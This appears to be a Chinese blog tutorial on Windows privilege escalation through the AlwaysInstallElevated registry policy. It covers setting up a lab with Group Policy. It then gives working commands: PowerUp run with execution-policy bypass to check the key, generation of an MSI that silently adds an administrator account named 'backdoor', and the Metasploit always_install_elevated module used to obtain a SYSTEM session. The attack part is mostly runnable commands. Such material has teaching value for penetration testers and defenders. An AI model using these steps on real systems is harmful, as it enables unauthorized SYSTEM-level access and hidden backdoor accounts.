[windows提权] 注册表AlwaysInstallElevated提权

简介: 注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。

一、提权简介

注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。



二、漏洞环境配置

①"运行"中输入gpedit.msc,打开组策略管理器

②计算机配置-->管理模板-->Windows 组件-->Windows Installer


③将"永远以高特权进行安装"编辑,选择开启


④用户配置-->管理模板-->Windows 组件-->Windows Installer中的"永远以高特权进行安装"编辑,也同样选择开启



三、提权操作

-使用powerup进行提权:

①以本地加载方式运行powerup,需要上传powerup.ps1到目标


powershell -exec bypass "import-module .\powerup.ps1;Get-RegistryAlwaysInstallElevated"

返回为Ture,存在提权漏洞


②利用Write-UserAddMSI模块生成msi文件


powershell -exec bypass "import-module .\powerup.ps1;Write-UserAddMSI"

可以看到在当前目录下成功生成msi文件


③以普通用户身份运行此msi文件


msiexec.exe /quiet /qn /i UserAdd.msi

成功添加用户backdoor,权限为管理员



-使用MSF进行提权:

MSF的exploit/windows/local/always_install_elevate模块可以自动完成提权操作,会创建一个随机文件名的msi文件,并在提权成功后删除此mai文件,攻击成功会返回system权限会话


①首先拿到一个不是最高权限的会话


getuid


②利用对应模块进行提权




use exploit/windows/local/always_install_elevatedset session 4run


攻击成功,返回了session 5


③查看session5的权限


getuid

成功提权至system

目录
相关文章
|
安全 关系型数据库 MySQL
windows提权总结
windows提权总结
315 1
|
Windows
Windows注册表维护与优化
Windows注册表维护与优化
64 0
|
Windows
Windows注册表基础
Windows注册表基础
49 0
|
4月前
|
Windows
【Windows驱动开发】注册表的基本操作(创建、打开、修改、读取、枚举)(附源码)
【Windows驱动开发】注册表的基本操作(创建、打开、修改、读取、枚举)(附源码)
|
4月前
|
Windows
windows系统bat批处理 清理注册表与蓝屏补丁
windows系统bat批处理 清理注册表与蓝屏补丁
37 1
|
安全 Windows
Windows提权/杀软进程在线对比
Windows提权/杀软进程在线对比
371 0
Windows提权/杀软进程在线对比
|
安全 Shell 测试技术
Windows提权EXP多种执行方式
Windows提权EXP多种执行方式
214 0
|
5月前
|
安全 Windows
Windows提权辅助工具
Windows提权辅助工具
126 1
|
10月前
|
监控 安全 API
6.8 Windows驱动开发:内核枚举Registry注册表回调
在笔者上一篇文章`《内核枚举LoadImage映像回调》`中`LyShark`教大家实现了枚举系统回调中的`LoadImage`通知消息,本章将实现对`Registry`注册表通知消息的枚举,与`LoadImage`消息不同`Registry`消息不需要解密只要找到`CallbackListHead`消息回调链表头并解析为`_CM_NOTIFY_ENTRY`结构即可实现枚举。
91 1
6.8 Windows驱动开发:内核枚举Registry注册表回调
|
10月前
|
监控 安全 API
7.5 Windows驱动开发:监控Register注册表回调
在笔者前一篇文章`《内核枚举Registry注册表回调》`中实现了对注册表的枚举,本章将实现对注册表的监控,不同于32位系统在64位系统中,微软为我们提供了两个针对注册表的专用内核监控函数,通过这两个函数可以在不劫持内核API的前提下实现对注册表增加,删除,创建等事件的有效监控,注册表监视通常会通过`CmRegisterCallback`创建监控事件并传入自己的回调函数,与该创建对应的是`CmUnRegisterCallback`当注册表监控结束后可用于注销回调。
101 0
7.5 Windows驱动开发:监控Register注册表回调
下一篇
无影云桌面